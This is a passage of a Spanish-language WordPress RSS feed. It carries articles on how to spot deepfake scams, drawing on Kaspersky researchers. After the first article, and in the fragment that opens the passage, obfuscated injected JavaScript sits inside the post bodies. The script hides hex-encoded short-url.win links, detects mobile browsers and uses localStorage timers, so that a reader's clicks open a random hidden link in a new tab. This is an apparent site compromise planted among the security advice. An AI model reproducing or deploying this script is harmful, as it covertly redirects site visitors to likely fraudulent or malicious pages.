_0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/la-nueva-era-del-ciberfraude/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98947</post-id>	</item>
		<item>
		<title>Protege tu veracidad: Señales de deepfakes</title>
		<link>https://www.todoenunclick.com/protege-tu-veracidad-senales-de-deepfakes/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 27 May 2024 13:00:00 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[detección]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[seguridad digital]]></category>
		<category><![CDATA[video falso]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98903</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/05/Seniales-de-Deepfakes-1.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Protege tu veracidad: Señales de deepfakes" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Seniales-de-Deepfakes-1.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Seniales-de-Deepfakes-1.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Seniales-de-Deepfakes-1.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Seniales-de-Deepfakes-1.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Seniales-de-Deepfakes-1.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Seniales-de-Deepfakes-1.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Seniales-de-Deepfakes-1.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>Los avances tecnológicos ofrecen nuevas formas de interacción digital y retos sin precedentes, como el fenómeno de los deepfakes: una técnica de edición de audio y video mediante Inteligencia Artificial que está siendo ampliamente explotada para engañar a la gente. Kaspersky ofrece consejos sobre cómo identificar los videos fraudulentos que utilizan esta tecnología.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Un <a href="https://latam.kaspersky.com/about/press-releases/2023_lena-para-la-infodemia-7-de-cada-10-latinoamericanos-desconoce-que-es-un-deepfake-contribuyendo-a-la-sobrecarga-mental">informe de Kaspersky</a> mostró que la mayoría de los usuarios en América Latina (67%) no reconoce cuando un video ha sido editado digitalmente utilizando la técnica deepfake, lo que refleja la sofisticación de las herramientas usadas por los delincuentes. Tampoco lo reconocen el 72% de colombianos, 71% de brasileros, 70% de chilenos, 68% de argentinos, el 62% de mexicanos y el 57% de peruanos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Ante la posibilidad de <a href="https://speechify.com/es/">crear este tipo de contenido falso de forma sencilla</a> en línea, los <a href="https://latam.kaspersky.com/about/press-releases/2023_deepfakes-la-amenaza-creciente-para-organizaciones">casos recientes de deepfakes de celebridades y figuras públicas</a> para difundir estafas, así como un <a href="https://latam.kaspersky.com/about/press-releases/2023_ciberdelincuentes-reciben-hasta-us20000-por-videos-deepfake-de-un-minuto-en-la-darknet-kaspersky">vasto mercado en la darknet</a>, los latinoamericanos se enfrentan a amenazas digitales que utilizan esta tecnología.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Los deepfakes representan una amenaza creciente para la integridad de la información digital, ya que su uso tiende a ser cada vez más imperceptible. Nos enfrentamos a un escenario en el que vemos una manipulación digital avanzada que compromete la verdad, exige cautela y necesita concientizar sobre este fenómeno. Ya es posible crear videos y audios falsos en internet de celebridades, figuras públicas o líderes de opinión, que pueden ser utilizados para desacreditar a una víctima o incluso extorsionar a quienes creen lo que la estafa muestra”</em>, comenta <strong>Fabio Assolini, director del Equipo Global de Investigación y Análisis para América Latina en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Ante esta realidad, Kaspersky te dice cuáles son las señales de un contenido falso:</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>1. ¿La imagen parece muy inconsistente, con fallas en el doblaje y sombras aleatorias? ¡Desconfía!</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Busca incoherencias en los movimientos faciales, expresiones o movimientos corporales que parezcan extraños o poco naturales. Busca desalineaciones en los ojos, la boca u otras partes de la cara. Si detectas estas anomalías, es importante que pongas en duda la autenticidad del video.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>2. ¿La información es demasiado buena para ser cierta? Busca la fuente oficial.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Comprueba si el contenido es verosímil y si coincide con otras fuentes de información fiables. Es importante desconfiar de videos o audios que parezcan fuera de contexto o que presenten información sospechosa, así como promociones demasiado buenas para ser ciertas. Busca también el origen de los contenidos y comprueba la credibilidad de las fuentes implicadas. Desconfía de los contenidos compartidos por fuentes desconocidas o no verificadas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>3. ¿El audio o video solicitan descargar una aplicación o incluso pagar a un tercero? No caigas en la trampa</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Como se ha visto anteriormente, los deepfakes de figuras públicas ya han dado a conocer estafas de robo financiero, con la idea inicial de descargar una aplicación o realizar inversiones en ciertas plataformas. Sé consciente de la existencia de los deepfakes e infórmate sobre las tecnologías de manipulación digital. Cuanto más consciente seas, mejor podrás detectar posibles estafas.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":98906,"width":"642px","height":"auto","sizeSlug":"large","linkDestination":"none","align":"center"} -->
<figure class="wp-block-image aligncenter size-large is-resized"><img src="https://www.todoenunclick.com/wp-content/uploads/2024/05/Seniales-de-Deepfakes-3-642x292.jpg" alt="" class="wp-image-98906" style="width:642px;height:auto"/><figcaption class="wp-element-caption"><em>Ejemplos de videos falsos de figuras públicas circulando en redes sociales</em></figcaption></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Kaspersky también ofrece recomendaciones adicionales para protegerse contra las estafas de deepfakes:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><!-- wp:list-item -->
<li><strong>Educación y concientización:</strong> Mantente informado sobre las tecnologías deepfake y los riesgos asociados a ellas. Sé consciente de las señales de advertencia y comparte estos conocimientos con amigos y familiares para promover una cultura de seguridad digital.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Atención en redes sociales:</strong> Permanece alerta del contenido compartido en redes sociales y cuestiona la veracidad de la información sospechosa. Evita compartir contenido que no haya sido verificado por fuentes confiables.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Denuncia los contenidos sospechosos:</strong> Si sospechas que un contenido es un deepfake o una manipulación digital, denúncialo a las autoridades competentes o en la plataforma donde lo encontraste. Combatir la difusión de deepfakes requiere de la colaboración de todos en Internet.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Para más información sobre ciberseguridad, visita el <a href="https://latam.kaspersky.com/blog/">blog</a> de Kaspersky.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/protege-tu-veracidad-senales-de-deepfakes/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98903</post-id>	</item>
		<item>
		<title>Fraudes en ascenso: Descubre cómo detectar Deepfakes y proteger tu identidad</title>
		<link>https://www.todoenunclick.com/fraudes-en-ascenso-descubre-como-detectar-deepfakes-y-proteger-tu-identidad/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 05 Feb 2024 18:44:38 +0000</pubDate>
				<category><![CDATA[Sin categoría]]></category>
		<category><![CDATA[Ciberdelincuentes]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[estafas]]></category>
		<category><![CDATA[identidad]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[protección]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98416</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/02/deep-fake_.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Fraudes en ascenso: Descubre cómo detectar Deepfakes y proteger tu identidad" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/02/deep-fake_.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/02/deep-fake_.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/02/deep-fake_.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/02/deep-fake_.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/02/deep-fake_.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/02/deep-fake_.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/02/deep-fake_.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>A inicios de año, <a href="https://latam.kaspersky.com/about/press-releases/2024_ano-nuevo-mismas-estafas-kaspersky-describe-el-panorama-de-seguridad-para-los-consumidores-en-2024">los </a><a href="https://latam.kaspersky.com/about/press-releases/2024_ano-nuevo-mismas-estafas-kaspersky-describe-el-panorama-de-seguridad-para-los-consumidores-en-2024">expertos de Kaspersky alertaron</a> que los cibercriminales podrían seguir explotando las herramientas de Inteligencia Artificial (IA) para crear contenidos engañosos más convincentes y accesibles, aumentando los riesgos asociados con los <em>deepfakes</em>. Esta tecnología consiste en imágenes, videos, e incluso audios y textos, alterados para mostrar información diferente a la original, por ejemplo, para que una persona suplante a otra. Recientemente, en distintos países han circulado distintos <a href="https://twitter.com/acervoxcx/status/1745567400399868344">videos <em>deepfakes</em></a> de celebridades para publicitar falsos juegos de apuestas con el objetivo de robar dinero a las víctimas. En otros países como <a href="https://twitter.com/ArquidiocesisMx/status/1749989002663375272?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1749989002663375272%7Ctwgr%5E63d8c914f86bc3c59618b897bbca0d2386daca37%7Ctwcon%5Es1_&amp;ref_url=https%3A%2F%2Fd-6730438083479816968.ampproject.net%2F2401032027001%2Fframe.html">México</a>, se han promocionado videos manipulados con IA promocionando “productos milagro” que en realidad son una estafa.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La mayoría de los latinoamericanos <a href="https://latam.kaspersky.com/blog/investigacion-la-infodemia-y-su-impacto-en-la-vida-digital/21992/">no sabe qué es un <em>deepfake</em></a> (69%). Así lo afirma el 67% de argentinos, 66% de brasileños, 72% de chilenos, 63% de colombianos, 72% de mexicanos y el 75% de peruanos. Al mismo tiempo, el 67% de latinoamericanos tampoco sabe reconocer un contenido de este tipo.&nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Kaspersky explica cómo funciona esta amenaza y comparte recomendaciones para que los usuarios sepan identificar los contenidos falsos.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"align":"center","id":98418,"sizeSlug":"full","linkDestination":"none","tdShowModal":true} -->
<div><a href="https://www.todoenunclick.com/wp-content/uploads/2024/02/deep-fake_2.jpg" class="td-modal-image"><figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2024/02/deep-fake_2.jpg" alt="" class="wp-image-98418"/><figcaption class="wp-element-caption">Ejemplos de videos falsos de figuras públicas circulando en redes sociales</figcaption></figure></a></div>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>A medida que el uso de la IA se va generalizando y haciendo más accesible, el riesgo de ser víctima de <em>deepfakes</em> es cada vez mayor, ya que, apoyados en esta tecnología, los estafadores pueden extraer fácilmente videos e imágenes de sus objetivos potenciales para alterarlos. Los expertos de Kaspersky <a href="https://www.kaspersky.com/blog/deepfake-darknet-market/48112/?utm_source=Kaspersky+2022&amp;utm_campaign=1120e93a54-EMAIL_CAMPAIGN_2020_01_07_07_36_COPY_02&amp;utm_medium=email&amp;utm_term=0_c9f4328145-1120e93a54-">han descubierto</a> que quienes buscan crear contenido multimedia falso suelen recurrir a la <em>Darknet</em>, donde existe una demanda significativa de este tipo de contenido. Los usuarios buscan activamente a personas que puedan crear videos falsos para ellos y, como estos casos, solicitan que sean de objetivos específicos, como celebridades o figuras políticas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esto para después utilizarlos con fines maliciosos, como chantaje, venganza, acoso o cometer fraudes financieros. Los recientes <em>deepfakes</em>, por ejemplo, difundidos en redes sociales, tienen como objetivo robar el dinero de los usuarios, convenciéndolos de que van a invertir en instituciones reconocidas y obtener grandes rendimientos o comprar productos que les ayudarán a mejorar su salud, aprovechando la necesidad económica y de una mejor calidad de vida de las personas, suponiendo un riesgo mayor para ellas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>"Nos enfrentamos a un escenario de manipulación digital avanzada que compromete la verdad, y nos exige a todos ser conscientes de este fenómeno. En un mundo donde la línea entre la realidad y la ficción digital es cada vez más difusa, debemos consumir los contenidos digitales con responsabilidad, siendo cuidadosos de lo que leemos y escuchamos, y evitando promover la desinformación compartiendo noticias, videos y audios falsos”, </em>comenta <strong>Isabel Manjarrez, Investigadora de seguridad del Equipo Global de Investigación y Análisis de Kaspersky</strong><em>. “En el mundo actual, es muy importante no creer todo lo que se lee y se escucha en Internet”, puntualizó.</em></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Reconocer un <strong><em>deepfake</em></strong> puede ser complicado, ya que las técnicas de manipulación digital evolucionan constantemente. Sin embargo, Kaspersky recomienda algunos consejos para detectar este tipo de contenidos:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><!-- wp:list-item -->
<li><strong>Anomalías faciales y corporales</strong>. Busca incoherencias en los movimientos faciales, expresiones o movimientos corporales que parezcan extraños o poco naturales. Detecta desalineaciones en los ojos, la boca u otras partes de la cara.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Sincronización labial y expresiones</strong>. Comprueba que las palabras correspondan correctamente con los movimientos de los labios y que las expresiones faciales son apropiadas para el contexto del video.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
